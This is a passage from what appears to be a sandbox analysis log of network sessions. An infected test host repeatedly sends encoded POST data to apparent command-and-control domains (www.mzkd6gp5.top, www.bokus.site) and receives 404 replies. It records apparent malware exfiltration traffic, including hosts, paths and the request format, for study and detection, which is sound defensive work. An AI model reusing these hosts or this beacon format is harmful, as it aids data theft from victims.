                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff5a023581ee269-ORD
                                                                                    Content-Encoding: gzip
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=119349&min_rtt=119349&rtt_var=59674&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                                    Data Ascii: f
                                                                                    Jan 9, 2025 16:57:53.012442112 CET | 105 | IN | Data Raw: 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9
                                                                                    Data Ascii: 63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                    Jan 9, 2025 16:57:53.012449026 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                    59 | 192.168.11.30 | 49884 | 104.21.32.180 | 80
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:57:55.125240088 CET | 819 | OUT | POST /3u0p/ HTTP/1.1
                                                                                    Host: www.mzkd6gp5.top
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.mzkd6gp5.top
                                                                                    Referer: http://www.mzkd6gp5.top/3u0p/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 35 33 35 33 6d 68 6f 56 48 33 2f 33 35 73 56 62 68 43 46 4e 36 52 41 58 54 70 6a 7a 44 65 63 57 74 79 63 37 70 2f 6b 70 79 57 6e 7a 46 2f 37 4f 57 4a 47 45 76 48 5a 49 6d 62 6b 6e 67 67 79 6f 42 68 30 30 66 45 4d 62 76 43 6e 69 6d 44 36 59 76 6e 64 4e 56 35 65 76 37 62 6d 4d 45 72 6a 53 59 4e 7a 31 74 53 6c 48 43 42 72 38 75 76 2b 58 44 67 6a 50 38 71 7a 63 6a 32 77 65 2b 59 67 6b 39 45 79 31 48 65 6f 72 52 42 36 2f 33 57 78 70 4c 31 5a 47 4a 34 49 59 6a 6d 49 75 79 55 32 4c 70 50 54 53 79 67 69 47 54 38 47 2b 79 49 77 6b 36 4e 45 49 61 35 51 2f 2f 42 54 78 4b 4f 37 43 76 49 33 6c 75 69 4f 64 30 6a 6f 3d
                                                                                    Data Ascii: 6B-l7F=h0wTz0QM+szd5353mhoVH3/35sVbhCFN6RAXTpjzDecWtyc7p/kpyWnzF/7OWJGEvHZImbknggyoBh00fEMbvCnimD6YvndNV5ev7bmMErjSYNz1tSlHCBr8uv+XDgjP8qzcj2we+Ygk9Ey1HeorRB6/3WxpL1ZGJ4IYjmIuyU2LpPTSygiGT8G+yIwk6NEIa5Q//BTxKO7CvI3luiOd0jo=
                                                                                    Jan 9, 2025 16:57:55.676002979 CET | 919 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:57:55 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8%2BVEtQ15KiJojdThOkBwjCnxmg%2FDDUgvIUVzUVGpFxZIW18r61XTVZF0rX%2BoGg3Bh%2F5JM8mfIcn%2FUEGHb6xalBxmM9i8QzT1rOIybO%2F77fIRQjTusn3HMcmFOhRmnA%2FogHEz"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff5a033eda6233a-ORD
                                                                                    Content-Encoding: gzip
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=119336&min_rtt=119336&rtt_var=59668&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=819&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                                    Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                    Jan 9, 2025 16:57:55.676012039 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                    60 | 192.168.11.30 | 49885 | 104.21.32.180 | 80
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:57:57.782006979 CET | 1289 | OUT | POST /3u0p/ HTTP/1.1
                                                                                    Host: www.mzkd6gp5.top
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.mzkd6gp5.top
                                                                                    Referer: http://www.mzkd6gp5.top/3u0p/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 35 33 35 33 6d 68 6f 56 48 33 2f 33 35 73 56 62 68 43 46 4e 36 52 41 58 54 70 6a 7a 44 65 55 57 75 48 51 37 37 6f 77 70 31 57 6e 7a 4e 66 37 4c 57 4a 47 5a 76 48 78 4d 6d 62 68 63 67 69 36 6f 42 41 55 30 59 32 30 62 6d 43 6e 69 74 6a 36 62 67 48 64 59 56 35 4f 56 37 62 32 4d 45 72 6a 53 59 4f 72 31 71 44 6c 48 45 42 72 2f 2b 66 2b 4c 55 77 6a 33 38 71 72 4d 6a 32 30 52 2b 65 30 6b 38 33 36 31 47 6f 63 72 52 42 36 2f 36 32 78 6f 4c 31 56 48 4a 34 51 4d 6a 6e 41 2b 79 69 4b 4c 70 36 4f 37 33 68 69 33 52 4f 32 48 75 4c 51 4e 74 66 63 47 55 4b 6b 4d 2f 69 66 64 63 65 2f 53 68 6f 76 77 38 42 4c 58 32 6b 76 55 6c 56 33 72 55 53 34 31 53 6b 2b 39 72 50 63 71 62 43 37 62 6c 59 39 2f 32 56 32 6a 4b 71 43 64 2b 6e 71 69 61 69 79 78 58 69 36 35 71 72 38 4f 4a 71 45 4e 6d 55 35 53 63 45 51 69 75 4b 75 45 41 66 79 30 56 52 4c 4e 59 4e 49 4f 44 38 4f 63 6e 78 66 6d 7a 67 4c 65 6b 5a 2f 62 4e 61 33 57 33 68 6a 72 64 32 6a 76 49 38 32 4f 35 6c 77 2f 32 78 67 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=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
                                                                                    Jan 9, 2025 16:57:57.782058954 CET | 2647 | OUT | Data Raw: 7a 62 79 43 76 53 74 73 39 4e 6c 31 55 43 76 32 50 4b 6c 44 34 52 44 2b 62 48 52 4b 6f 46 4a 79 64 4a 30 57 77 62 31 57 74 30 35 68 50 30 76 34 4d 63 39 79 33 6a 72 6a 67 48 58 43 53 33 2b 36 6b 47 45 6d 49 6a 4d 61 47 70 79 36 6c 54 6c 38 68 64
                                                                                    Data Ascii: zbyCvSts9Nl1UCv2PKlD4RD+bHRKoFJydJ0Wwb1Wt05hP0v4Mc9y3jrjgHXCS3+6kGEmIjMaGpy6lTl8hd98byvOiynP85ke6zWthD+c869bmHCp/ScJ3oNuRt8mY9HGvfIlWxURU6LhKkY9QO3FPlUEBnsvEVihs4igtfasTmsHs1Y7/UPklpDCH3A3V3z1+GL20+i8QwMPXZPbj3TX3Xxo6reJ0VnPYOzln0j8kVDRtBXX+7w
                                                                                    Jan 9, 2025 16:57:58.347882032 CET | 910 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:57:58 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DnnF83MshvNWhunqlYjFBVtSSDHeezi9y%2FfglLtwhYbufnIIrSg9HZsg9z04dXexydWa07AfZxi8WZv2zilxPTF2Xf7ZaaufoPn8PHRc2ql4bQaoR%2FMHY7OjlU11TTd8OrPQ"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff5a0448a6a10ed-ORD
                                                                                    Content-Encoding: gzip
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=118564&min_rtt=118564&rtt_var=59282&sent=3&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=3936&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                                    Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                    Jan 9, 2025 16:57:58.347898006 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                    61 | 192.168.11.30 | 49886 | 104.21.32.180 | 80
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:58:00.434335947 CET | 535 | OUT | GET /3u0p/?6B-l7F=s2YzwEkhsdaL/kJXp3k+A3KGmeJ3qBEv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/7SrF93BKOupqiEzChM=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.mzkd6gp5.top
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:58:00.984829903 CET | 928 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:58:00 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kwE%2BxxjkBYKmn%2FLrgRASdSOP2JOWtsaIhHx7j8%2FGqIIdLoEVSqLZ2V46eevsA7lCP8j0G67TTIC9gRTIwQL8TB%2FHQ0CAkZAJWJfRPL0In0yZxGWstAsIG95aubTuckrO6%2BKp"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff5a0552864e269-ORD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=119652&min_rtt=119652&rtt_var=59826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=535&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                    Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                    Jan 9, 2025 16:58:00.984838963 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                    62 | 192.168.11.30 | 49887 | 199.192.21.169 | 80
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:58:06.199731112 CET | 793 | OUT | POST /qps0/ HTTP/1.1
                                                                                    Host: www.bokus.site
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bokus.site
                                                                                    Referer: http://www.bokus.site/qps0/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 32 4a 72 77 2f 65 56 54 2f 50 6a 54 68 4b 76 32 56 2b 4e 63 59 49 55 59 64 47 4c 71 62 67 50 74 6b 43 69 39 74 79 38 5a 30 6d 68 73 47 38 32 2b 73 6b 67 6c 79 4d 6f 6f 53 73 6c 36 4f 31 51 61 69 50 4a 63 32 63 70 39 4b 48 5a 4e 6f 46 4e 58 4a 5a 31 35 4c 6c 44 6d 34 43 32 51 5a 4d 48 6b 37 47 50 33 5a 75 6b 55 78 72 4f 6b 49 65 56 30 59 31 32 5a 6a 68 67 67 55 39 6d 46 2b 57 44 56 63 63 4b 44 48 4b 37 36 31 58 72 41 75 4b 76 68 35 7a 6d 70 39 45 39 43 4b 2f 7a 47 75 4e 6c 31 62 55 41 74 66 4d 6c 46 63 2b 69 2b 69 59 4c 76 64 49 63 42 76 41 3d 3d
                                                                                    Data Ascii: 6B-l7F=lcXtcPN+FJHJ2Jrw/eVT/PjThKv2V+NcYIUYdGLqbgPtkCi9ty8Z0mhsG82+skglyMooSsl6O1QaiPJc2cp9KHZNoFNXJZ15LlDm4C2QZMHk7GP3ZukUxrOkIeV0Y12ZjhggU9mF+WDVccKDHK761XrAuKvh5zmp9E9CK/zGuNl1bUAtfMlFc+i+iYLvdIcBvA==
                                                                                    Jan 9, 2025 16:58:06.392939091 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:58:06 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 774
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                    63 | 192.168.11.30 | 49888 | 199.192.21.169 | 80
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:58:08.913022041 CET | 813 | OUT | POST /qps0/ HTTP/1.1
                                                                                    Host: www.bokus.site
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bokus.site
                                                                                    Referer: http://www.bokus.site/qps0/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 72 74 71 41 71 39 73 78 6b 5a 33 6d 68 73 56 38 32 37 69 45 67 79 79 4d 6b 4b 53 6f 6c 36 4f 32 73 61 69 4f 35 63 78 72 64 2b 49 58 5a 50 78 31 4e 56 44 35 31 35 4c 6c 44 6d 34 43 79 32 5a 4d 66 6b 37 57 66 33 66 38 41 62 37 4c 4f 6e 42 2b 56 30 50 46 32 64 6a 68 68 4e 55 38 71 76 2b 51 48 56 63 59 4f 44 48 59 54 31 67 6e 72 47 71 4b 75 4f 34 41 37 45 31 6e 6c 31 62 75 48 69 32 75 78 74 65 44 74 33 43 50 52 48 50 65 65 54 2b 5a 6d 48 66 4b 64 61 79 45 45 43 62 77 4d 2b 74 52 6e 6a 61 2b 4d 6d 2f 5a 35 7a 51 7a 49 3d
                                                                                    Data Ascii: 6B-l7F=lcXtcPN+FJHJ5NXw85BTu/jU86v2beNYYIYYdDyybSrtqAq9sxkZ3mhsV827iEgyyMkKSol6O2saiO5cxrd+IXZPx1NVD515LlDm4Cy2ZMfk7Wf3f8Ab7LOnB+V0PF2djhhNU8qv+QHVcYODHYT1gnrGqKuO4A7E1nl1buHi2uxteDt3CPRHPeeT+ZmHfKdayEECbwM+tRnja+Mm/Z5zQzI=
                                                                                    Jan 9, 2025 16:58:09.106559992 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:58:09 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 774
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                    64 | 192.168.11.30 | 49889 | 199.192.21.169 | 80
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:58:11.627082109 CET | 2578 | OUT | POST /qps0/ HTTP/1.1
                                                                                    Host: www.bokus.site
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bokus.site
                                                                                    Referer: http://www.bokus.site/qps0/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 6a 74 71 31 6d 39 6a 77 6b 5a 32 6d 68 73 57 38 32 41 69 45 67 76 79 4d 38 4f 53 6f 67 42 4f 7a 67 61 6a 6f 74 63 77 5a 31 2b 53 48 5a 50 73 46 4e 57 4a 5a 30 37 4c 6c 7a 69 34 42 61 32 5a 4d 66 6b 37 55 58 33 4a 65 6b 62 30 72 4f 6b 49 65 56 6f 59 31 32 35 6a 6e 49 34 55 38 2f 61 2b 57 62 56 64 70 65 44 48 72 37 31 67 6e 72 47 6e 71 75 4c 34 41 33 5a 31 6e 74 59 62 76 4f 56 32 2b 56 74 66 33 38 38 57 2f 67 5a 64 2f 44 63 32 6f 47 35 66 4c 70 77 7a 32 59 62 62 77 67 37 39 44 2f 4f 44 2f 73 49 37 37 5a 37 55 32 42 4f 37 54 34 48 5a 74 41 75 43 38 61 74 54 50 68 6a 38 4b 38 47 56 4d 6d 55 74 72 42 44 7a 36 78 43 4f 52 4e 79 59 78 42 51 48 62 6f 47 69 79 2b 33 62 4a 48 79 50 45 55 50 45 72 4e 4a 57 46 59 35 33 5a 6f 51 4d 68 4d 63 54 77 6f 59 68 6f 76 69 54 49 35 38 32 61 55 34 43 51 36 37 53 53 31 76 64 73 58 53 74 52 76 2b 76 68 38 55 62 6c 71 6e 6f 76 32 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=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 [TRUNCATED]
                                                                                    Jan 9, 2025 16:58:11.627146959 CET | 1352 | OUT | Data Raw: 47 53 65 75 37 63 75 42 76 70 74 36 59 33 30 47 62 42 57 44 35 65 70 7a 63 4a 61 4f 53 71 78 35 62 71 71 46 6a 4a 4f 31 52 5a 33 61 2f 4a 2f 2f 78 68 78 39 41 58 6f 68 41 50 73 42 2f 6e 68 37 6c 51 6b 76 6e 55 72 43 30 59 6a 44 38 74 35 75 76 4a
                                                                                    Data Ascii: GSeu7cuBvpt6Y30GbBWD5epzcJaOSqx5bqqFjJO1RZ3a/J//xhx9AXohAPsB/nh7lQkvnUrC0YjD8t5uvJH+btWLlkM5T++pBUQ57tsNVA25ZzYgNS9RHwBLeXsMQCl1VLVt7rV7Ule2JzZukKpuKoTaiQijN4V6v5WrCsKUfUXnwhlGUX+vMWIlAoMw/PWjcHnvseFjA8OX1jj+yoW515+tok/RZwFLSS3I98ReNPwgY/iFRDm
Jan 9, 2025 16:58:11.813493967 CET | 918 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 09 Jan 2025 15:58:11 GMT
    Server: Apache
    Content-Length: 774
    Connection: close
    Content-Type: text/html
